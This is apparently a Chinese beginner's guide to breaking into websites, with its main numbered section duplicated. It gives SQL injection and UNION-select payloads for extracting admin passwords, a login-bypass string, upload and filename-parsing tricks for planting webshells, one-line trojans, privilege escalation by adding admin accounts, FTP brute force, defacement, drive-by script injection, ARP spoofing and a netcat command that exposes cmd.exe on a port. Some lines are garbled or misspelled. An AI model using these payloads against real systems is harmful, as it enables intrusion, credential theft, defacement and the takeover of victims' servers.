1，〓经典注入〓

 通常，判断一个网站是否存在注入点，可以用’，and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1,%20and%201=2,来判断，如果and 1=1正常返回页面，1=2错误，或者找不到，那么就存在注入点
2，〓万能密码OR漏洞〓
万能密码'or'='or',可以用在后台管理输入，有的网站由于没有过滤OR漏洞，输入OR直接就可以突破，一般漏洞存在于ASP类型的网站

3，〓爆库〓
爆库，可以理解为爆出数据库下载，用爆库之类的工具可以直接就获得管理员用户和密码，%5C为十六进制的符号，而数据库大于5.0就可以进行爆库，如在PHP手工高级注入时，用VERSION（）这个变量猜出网站数据库版本，如果一个网站数据库大于5.0，且是ACESS数据库，那么提交地址是：http://www.xxx.com/rpc/show24.asp?id=127,我们直接把%5C加到RPC后面，因为%5C是爆二级目录，所以应该是这样，http://www.xxx.com/rpc%5c/show24.asp?id=127,而%23是代表#，如果管理员为了防止他人非法下载数据库，而把数据库改成#database.mdb,这样防止了，如果页面地址为http://www.xx.com/rpd/#database.mdb,是这样的，那么我们把%23加到替换#,http://www.xx.com/rpd/%23database.mdb
4，〓COOKIE中转，SQL防注入程序，提醒你IP已被记录〓
COOKIE中转，SQL防注入，如果检测一个网站时，弹出这样一个对话框，上面出现SQL防注入程序提醒的字语，那么我们可以利用COOKIE中转，注入中转来突破，方法是先搭建一个ASP环境（且网站为ASP网站），然后打开中转工具，记住一个网站的页面地址粘贴进工具里，值是多少就写多少，生成，把生成的文件放到目录里，接下来，打开网页，输入http://127.0.0.1:(端口）/目录里文件，如果正常，那么输入http://127.0.0.1:端口/值（目录文件）？提交值，那么拿到工具里猜表名，列名了
5， 〓手工〓
ASP手工语句 表名 and exists (select * from 表名)

                         列名 and (select count(列名) from 表名)>0
                         长度 and (select top 1 len(username) from admin)>0
                          内容 and (select top 1 asc(mid(username,1,1)) from admin)>100

PHP手工语句：order by（猜字段），and 1=2 union select （字段数）and 1=2 union selsect from(位置）
如果有30个字段，那么就应该在注入地址后输入http://www.xxx.com/showfo.jsp?id=130 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28.29,30
几个常用变量 ，USER(),VERSION()<数据库版本），database()<数据库名称>
6，〓抓包拿WEBSHELL〓
如果进入后台发现，点数据库备份的时候发现找不到，可以通过抓包来获得上传，拿到WEBSHELL，工具WOSCK抓包，一张图片，一个ASP马，自行搭建一个上传地址，UPLOAD加载，UPFILE上传，COOKIS=（ ）
7，〓数据库备份拿WEBSHELL和一句话木马入侵〓
通常进入后台了，发现有数据库备份，拿WEBSHELL吧，找一个添加产品的地方，传一个大马，格式为JPG图片，然后把图片地址粘贴到数据库备份那里，给起个名字，如SHELL.ASP,然后合地址访问的时候就进入webshell了，一句话木马入侵，先编辑记事本，加入一句话，改为2.jpg,然后备份，访问，发现500内部服务器错误，证明一句话成功，接下来用一句话木马客户端连接，得到路径页面，然后改下马名，输入大马内容，提交，得到WEBSHELL
8，〓DB权限差异备份拿WEBSHELL〓
如果一个网站注入点是MYSQL数据库，且是DB权限，或者是SA权限，能够列目录，那么就好办了，找到网站的目录，目录通常在D和E盘，备份个小马，合地址访问看看成功没，直接备份大马貌似不行，成功后，再输入大马内容，拿到WEBSHELL
9，〓找后台〓
找后台，一般默认为admin,admin/admin.asp,admin/login.asp,.admin_login.asp,manage/login.asp,login.asp,logon,user.asp,admin/index.asp,当然，这只是默认，一些大网站不可能还用admin作为后台，有的隐藏很深，可以简单用site:网站 inurl:后台来猜，或者下载源HTML文件分析找出后台，或者用各种工具来扫描了，方法很多的
10，〓脚本提示〓
有的网站要求进入后台会出现一个脚本提示，就像VB编程里INPUTBOX “”，一个对话输入框，我们输入administrator突破，admin代表以管理员身份来进入
11，〓php后门和EWEBEDITOR编辑器入侵〓
PHP后门，如之前爆出的DISZ漏洞，在一个PHP网站后面加C.PHP,如果出现1，那么传个PHP马就拿到WEBSHELL，EWEBEDITOR编辑器入侵，是很快速的方式，设置好上传文件类型，传ASA，或者其他的格式，然后访问拿到WEBSHELL，如没有直接加语句拿到WEBSHELL
12，〓上传漏洞〓
有的网站虽然没有注入点，但存在一个上传漏洞，那么我们如何来利用了，首先，打开上传地址看是否存在，如果有，试想传一个ASP大马是不行的，那么传一句话看看，先看能成功不，用明小子来上传，动网，动力，动感，乔客4种方式，页面地址格式要对应，如果一个网站地址弹出对话框，显示上传成功，那么证明可以拿到WEBSHELL，传马，另外有的没有任何显示，直接空的，那么可以构建两个上传，第一个传JPG的图片，第二个传ASP马（大马），记住，大马后面要有个空格才行，如果一个网站地址出现文件类型不正确，请重新上传，那么证明%90可以拿到WEBSHELL，只是格式不对，不允许，改后缀，只要是网站没有过滤的格式，如果一个网站地址显示请登陆再上传，那么证明没有拿到COOKIS，思路是在该网站注册一个用户，得到COOKIS，然后上传就成功了
13，〓简单提权拿下服务器和SERV提权和pcanywhere三方提权〓
简单拿下服务器，也就是拿下网站IP主机，首先我们需要一个WEBSHELL，然后看看组件信息，看看路径可读可以写不，如果有一个可以，那么来到CMD命令下，首先输入可写的文件内容，执行命令加一个帐号和最高管理权限，然后输入netstat -an,得到主机连接端口，然后用3389连接进入，让其成为肉鸡（最好），这样比较隐蔽我们操作
14，〓反查入侵和旁注和社会工程学〓
反查IP入侵，也就是入侵21，端口，首先我们入侵网站先PING WWW.XXX.COM ,出IP，然后到反查IP站点查挂了多少个域名，接下来，添加webmaster@地址，加入字典，（里面多收集可能的口令，如123，321，456），然后用流光探测密码，登陆ftp://ip,输入用户和密码，改掉信息等等，社会工程学X-WAY，来得到FTP密码，也需要收集，并不是每个都行，总之是自己的经验
15，〓跨站脚本攻击〓
跨站（CSS），被动攻击，现在需要更多的思路和经验了
三段经典跨站代码
<script>alert("跨站开始")</script>
<script>alert("document.cookie")</script>
<script>window.open(http://www.hackgirl.net)<;/script>
16〓特殊空格〓
利用TAB制作的特殊空格，然后注册时输入空格，加管理名字，随便在网站上找个斑竹，或者管理的名字，这样来注册，有时自己注册的这个也会变成管理员
17，〓改主页〓
改主页，拿到WEBSHELL后，先找出首页文件，一般为index.asp,index.php.index.jsp,index.html,然后来到站点根目录，编辑index.asp(首页），清空，最好备份，输入自己的主页代码（黑页），保存，再访问时已经变成自己想要的结果了
18，〓挂马〓
首先在WEBSHELL里，建立一个文本，改为1.htm,接下来在主页最下面挂
两段经典挂马代码
<html>

<cml>
<SCRIPT language=javascript>
window.open("http://www.xxx.com/2.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
</script>
19 〓 GOOGLE BACK语句〓（很多）
inurl:asp?id= ,inurl:show.asp ,inurl:went.asp ,inurl:jsp?id=,inurl:php?id=
20,〓自寻漏洞〓
自己根据自己的技术经验和积累，找出还没有被发现的漏洞（思路问题了）

一般ASP的网站 应用于小型公司企业所需求

常见漏洞：SQL注入 ，爆库，目录遍历，越权访问，上传，弱密，社会工程学，XSS , 编辑器, COOKIE, OR，FTP，穷举

SQL漏洞原因：变量过滤不严，

爆库是由于没有写容错代码

注入测试方法：AND 1＝1 AND 1＝2 前提是动态网站，而非静态

在网站上打开一个新闻的动态页面，然后打一‘提交

http://www.baidu.com/asp/asp?id=30%20and%201=1 正常

http://www.baidu.com/asp/asp?id=30%20and%201=2 错误

存在注入 ，工具注入，以及手工注入都是可以的

需要进行猜表，表名，列名，以及用户，最后获得密码

密码一般都是16进制加密，需要到专门的MD5网站进行解密

爆库，一般分为两种，一种是CONN爆库 %5C爆库 %23爆库

CONN爆库是由于管理员没有阻止外部人员对此文件的访问

导致可以访问：http://www.adminx.com/admin/conn.asp 如果报错一定会出现数据库的具体路径

           http://www.adminx.com/inc/config.asp  一般是禁止的

           http://www.adminx.com/inc/conn.asp  一般为空白

表达式：http://www.xxx.com/include/upload.jsp http://www.com/include_admin/upload.asp http://www.com/upload_class.asp

例如利用者把上传页面的源码保存到本地记事本，然后在第一行写入GIF89A，再进行图片提交

或者使用一句话木马的方式合并到图片中，上传 比如之前早期的NGINX漏洞就是利用的IIS双向解析功能实现

表达式：http://www.xxx.com/php/ass/1.jpg/先访问这个图片地址 ，如果能正常显示，再合访问0x.php

    http://www.xxx.com/php/ass/1.jpg/0x.php 会出现空白，你会发现什么也没有，其实是后门成功了！

通过一句话木马PHP客户端连接，输入密码就可以上传脚本木马到网站根目录获得WEBSHELL的权限

解析表达式：1.asp;.jpg 1.jpg.asp 2.asa;.gif 0x;x.jpg;0x;y.jpg

意思就是末尾虽然是图片的格式，但他会通过ASP，ASA这样的方式去执行这个图片，其实相当于执行了我们的脚本木马了！

网站入侵思路（初级黑客渗透篇） 作者:80

1，〓经典注入〓
 通常，判断一个网站是否存在注入点，可以用’，and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1,%20and%201=2,来判断，如果and 1=1正常返回页面，1=2错误，或者找不到，那么就存在注入点
2，〓万能密码OR漏洞〓
万能密码'or'='or',可以用在后台管理输入，有的网站由于没有过滤OR漏洞，输入OR直接就可以突破，一般漏洞存在于ASP类型的网站

3，〓爆库〓
爆库，可以理解为爆出数据库下载，用爆库之类的工具可以直接就获得管理员用户和密码，%5C为十六进制的符号，而数据库大于5.0就可以进行爆库，如在PHP手工高级注入时，用VERSION（）这个变量猜出网站数据库版本，如果一个网站数据库大于5.0，且是ACESS数据库，那么提交地址是：http://www.xxx.com/rpc/show24.asp?id=127,我们直接把%5C加到RPC后面，因为%5C是爆二级目录，所以应该是这样，http://www.xxx.com/rpc%5c/show24.asp?id=127,而%23是代表#，如果管理员为了防止他人非法下载数据库，而把数据库改成#database.mdb,这样防止了，如果页面地址为http://www.xx.com/rpd/#database.mdb,是这样的，那么我们把%23加到替换#,http://www.xx.com/rpd/%23database.mdb
4，〓COOKIE中转，SQL防注入程序，提醒你IP已被记录〓
COOKIE中转，SQL防注入，如果检测一个网站时，弹出这样一个对话框，上面出现SQL防注入程序提醒的字语，那么我们可以利用COOKIE中转，注入中转来突破，方法是先搭建一个ASP环境（且网站为ASP网站），然后打开中转工具，记住一个网站的页面地址粘贴进工具里，值是多少就写多少，生成，把生成的文件放到目录里，接下来，打开网页，输入http://127.0.0.1:(端口）/目录里文件，如果正常，那么输入http://127.0.0.1:端口/值（目录文件）？提交值，那么拿到工具里猜表名，列名了
5， 〓手工〓
ASP手工语句 表名 and exists (select * from 表名)

                         列名 and (select count(列名) from 表名)>0
                         长度 and (select top 1 len(username) from admin)>0
                          内容 and (select top 1 asc(mid(username,1,1)) from admin)>100

PHP手工语句：order by（猜字段），and 1=2 union select （字段数）and 1=2 union selsect from(位置）
如果有30个字段，那么就应该在注入地址后输入http://www.xxx.com/showfo.jsp?id=130 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28.29,30
几个常用变量 ，USER(),VERSION()<数据库版本），database()<数据库名称>
6，〓抓包拿WEBSHELL〓
如果进入后台发现，点数据库备份的时候发现找不到，可以通过抓包来获得上传，拿到WEBSHELL，工具WOSCK抓包，一张图片，一个ASP马，自行搭建一个上传地址，UPLOAD加载，UPFILE上传，COOKIS=（ ）
7，〓数据库备份拿WEBSHELL和一句话木马入侵〓
通常进入后台了，发现有数据库备份，拿WEBSHELL吧，找一个添加产品的地方，传一个大马，格式为JPG图片，然后把图片地址粘贴到数据库备份那里，给起个名字，如SHELL.ASP,然后合地址访问的时候就进入webshell了，一句话木马入侵，先编辑记事本，加入一句话，改为2.jpg,然后备份，访问，发现500内部服务器错误，证明一句话成功，接下来用一句话木马客户端连接，得到路径页面，然后改下马名，输入大马内容，提交，得到WEBSHELL
8，〓DB权限差异备份拿WEBSHELL〓
如果一个网站注入点是MYSQL数据库，且是DB权限，或者是SA权限，能够列目录，那么就好办了，找到网站的目录，目录通常在D和E盘，备份个小马，合地址访问看看成功没，直接备份大马貌似不行，成功后，再输入大马内容，拿到WEBSHELL
9，〓找后台〓
找后台，一般默认为admin,admin/admin.asp,admin/login.asp,.admin_login.asp,manage/login.asp,login.asp,logon,user.asp,admin/index.asp,当然，这只是默认，一些大网站不可能还用admin作为后台，有的隐藏很深，可以简单用site:网站 inurl:后台来猜，或者下载源HTML文件分析找出后台，或者用各种工具来扫描了，方法很多的
10，〓脚本提示〓
有的网站要求进入后台会出现一个脚本提示，就像VB编程里INPUTBOX “”，一个对话输入框，我们输入administrator突破，admin代表以管理员身份来进入
11，〓php后门和EWEBEDITOR编辑器入侵〓
PHP后门，如之前爆出的DISZ漏洞，在一个PHP网站后面加C.PHP,如果出现1，那么传个PHP马就拿到WEBSHELL，EWEBEDITOR编辑器入侵，是很快速的方式，设置好上传文件类型，传ASA，或者其他的格式，然后访问拿到WEBSHELL，如没有直接加语句拿到WEBSHELL
12，〓上传漏洞〓
有的网站虽然没有注入点，但存在一个上传漏洞，那么我们如何来利用了，首先，打开上传地址看是否存在，如果有，试想传一个ASP大马是不行的，那么传一句话看看，先看能成功不，用明小子来上传，动网，动力，动感，乔客4种方式，页面地址格式要对应，如果一个网站地址弹出对话框，显示上传成功，那么证明可以拿到WEBSHELL，传马，另外有的没有任何显示，直接空的，那么可以构建两个上传，第一个传JPG的图片，第二个传ASP马（大马），记住，大马后面要有个空格才行，如果一个网站地址出现文件类型不正确，请重新上传，那么证明%90可以拿到WEBSHELL，只是格式不对，不允许，改后缀，只要是网站没有过滤的格式，如果一个网站地址显示请登陆再上传，那么证明没有拿到COOKIS，思路是在该网站注册一个用户，得到COOKIS，然后上传就成功了
13，〓简单提权拿下服务器和SERV提权和pcanywhere三方提权〓
简单拿下服务器，也就是拿下网站IP主机，首先我们需要一个WEBSHELL，然后看看组件信息，看看路径可读可以写不，如果有一个可以，那么来到CMD命令下，首先输入可写的文件内容，执行命令加一个帐号和最高管理权限，然后输入netstat -an,得到主机连接端口，然后用3389连接进入，让其成为肉鸡（最好），这样比较隐蔽我们操作
14，〓反查入侵和旁注和社会工程学〓
反查IP入侵，也就是入侵21，端口，首先我们入侵网站先PING WWW.XXX.COM ,出IP，然后到反查IP站点查挂了多少个域名，接下来，添加webmaster@地址，加入字典，（里面多收集可能的口令，如123，321，456），然后用流光探测密码，登陆ftp://ip,输入用户和密码，改掉信息等等，社会工程学X-WAY，来得到FTP密码，也需要收集，并不是每个都行，总之是自己的经验
15，〓跨站脚本攻击〓
跨站（CSS），被动攻击，现在需要更多的思路和经验了
三段经典跨站代码
<script>alert("跨站开始")</script>
<script>alert("document.cookie")</script>
<script>window.open(http://www.hackgirl.net)<;/script>
16〓特殊空格〓
利用TAB制作的特殊空格，然后注册时输入空格，加管理名字，随便在网站上找个斑竹，或者管理的名字，这样来注册，有时自己注册的这个也会变成管理员
17，〓改主页〓
改主页，拿到WEBSHELL后，先找出首页文件，一般为index.asp,index.php.index.jsp,index.html,然后来到站点根目录，编辑index.asp(首页），清空，最好备份，输入自己的主页代码（黑页），保存，再访问时已经变成自己想要的结果了
18，〓挂马〓
首先在WEBSHELL里，建立一个文本，改为1.htm,接下来在主页最下面挂
两段经典挂马代码
<html>

<cml>
<SCRIPT language=javascript>
window.open("http://www.xxx.com/2.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
</script>
19 〓 GOOGLE BACK语句〓（很多）
inurl:asp?id= ,inurl:show.asp ,inurl:went.asp ,inurl:jsp?id=,inurl:php?id=
20,〓自寻漏洞〓
自己根据自己的技术经验和积累，找出还没有被发现的漏洞（思路问题了）

一般漏洞首先就是注入了，

表示式:http://www.ccc.com/asp/php?id=10%20order%20by%201 猜字段

    http://www.ccc.com/asp/php?id=10%20order%20by%2018  正常

    http://www.ccc.com/asp/php?id=10%20order%20by%2020  错误

可以判断字段19个，依次拼写19个字段在地址中 ，3个常用变量，database() version user()

3个函数转换要知道 ，c:/win.ini load_file(), 注射时还可以使用HEX（MID函数进行读路径）

路径表达式：d:/wwwroot/php/uc/config.php

表达式：http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 页面显示正常既为成功

  http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin 如果错误页面找不到

http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user 页面正常既为找到，一般会显示出几个数字，如3，6，8，等字样，我们一般就取3与6

http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user 查看用户: root@localhost
http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user 查看数据库的版本，大于5，0可以爆库

http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,databse(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user 查看数据库的名字

http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,user,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user 页面正常既为猜到用户与密码，反之会返回错误404

http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,load_file(读取INI地址),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user

http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,HEX(MID),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user

还有就是一些系统源码的ODAY，比如动网论坛，动易，老Y文章系统，动科，风讯，DEDECMS织梦，帝国CMS

等等，一般遇到这类的漏洞，有的是EXP注射，有的则需要GET SHELL，自己搭建好PHP环境，接着在DOS窗口里输入命令执行相关漏洞，如开源工具MSF ，就是集成的溢出平台，需要哪个直接通过命令调用就可以了 命令为：show exploits

除此之外，还有PHP文件包含漏洞

表达格式：http://www.a.com/asp/id=http://www.b.com/1.php

也就是说在A点取得的权限，通过源码系统，之间到B点进行读取，这样的话，B点就被利用了，我们就这样获得了B的权限

但前提是在A点先取得权限！

包括ASPX，出现的有时候会出现一个CER表单漏洞，或者是万能密码漏洞

JSP 漏洞分析

JSP一般用于，银行，新闻门户站，安全性在外人看来相对较高，但JSP安全性虽然最高，但要说明的是，在提权技术里，JSP权限却是最大的，而相对于不太安全的ASP网站，ASP匿名的权限却降低了！MYSQL有时候也会出现降权！

漏洞一般存在于JS校检未过滤

导致上传

二级域名上传漏洞

表达式：http:www.xx.gov.cn http://ad.xx.gov.cn/upload.asp http://svx.xx.gov.com/upload.php

<form>

<form action="sadd.jsp" method="post"><br/>

<input type="file" ><br/>

<input type="submit" value="go!">

</form>

后台管理权限技术

假如我们通过一个很简单的密码测试进入了自己搭建的网站后台，这时候我们需要获得WEBSHELL权限的时候，就可以通过各种途径了，方法有很多

例如数据库备份，抓包改包，搭建地址两次上传，解析，直接上传，等等

允许的格式：gif,bmp,jpg

禁止的格式：cer,asp,php,jsp,aspx

旁注漏洞的诞生，也就是网站服务器上，捆绑了很多域名，有购物网，人才网，新闻网，我们目标是新闻网，而新闻网通过测试并未发现很多漏洞，这时候我们就可以人才网入手，去检测，最终通过跨目录，或者ASPX IIS 权限读写的方式获得新闻网的权限

C段，也就是可以IP地址来表示 ，一个IP段 210.44.123.1-219.44.123.255 之间的255台机器，比如，利用者的目标是210，44，123，5这个地址

这时候我们只需要在这个段里检测成功一台服务器后，在服务器里执行嗅探，如果对方目标未装防火墙，则会被嗅探到，这就是服务器分离状态下的利用方式

表达式： a : 》 b: 》

-- a  目标服务器

b++   在B段里找一台同网段的服务器

b++ =a  最终嗅到数据，最后指向目标A

而劫持，与欺骗，都是在cain 与NET FUCER里面完成的

劫持，一般分为域名劫持，以及ARP劫持

一般是在同网段服务器里与C段一样的方式，但不同的是，他运用的是劫持

也就是发送欺骗流量包给目标服务器，服务器被欺骗后主页文件就自动被改成我们想要的内容了。

而欺骗，一般是ARP，或者是DNS欺骗，ARP欺骗主要是欺骗目标机器的3389 HOST文件，文本格式

利用C32反汇编工具打开可以清楚的看到在地址的后边，用户与密码就泄露了

服务器提权技术

在自行搭建的SHELL网站里，如果不会提权，那么就无法进行下一步

所以我们需要学习提权技术

而提权技术一般分别 WIN LINUX提权

常用工具：巴西烤肉 ，PR大杀器 ，NC监听，LCX转发 ，WIN2003内核溢出 ，IIS6，0， MS，EXE ，SHIFT后门

提权的步骤

1，检查网站的权限，如ASP匿名权限 ，是否支持ASPX

2，检查WC组件是否支持

3，一般来说，回收站与TEMP目录权限是比较大的

4，检查CONFIG，ASP，CONN。ASP相关密码

5，检查FXP 传输工具的文件

5，检查是否安装PCANYWHERE

6，是否安装SERTU FTP服务器

7，检查3389端口是否开启

8，检查目录文件程序是否可以替换

9，检查RAMIN密码是否存在

10，检查检查是否支持JSP权限

这是外网的方式，而遇到内网的时候，则需要转发 ，首先得本地监听，再转发到3389，利用本地127地址：监听端口去连接对方3389

NC反弹命令： C:/winodws/nc.exe -l -p 5858 -t -e c:/windows/cmd.exe
还有一个就是SHELL CODE ，牛人的道路从这里启航！
一个真正懂安全的人，
会说自己是最有安全感！
一个真正不懂安全的人，
会说自己没有安全可言！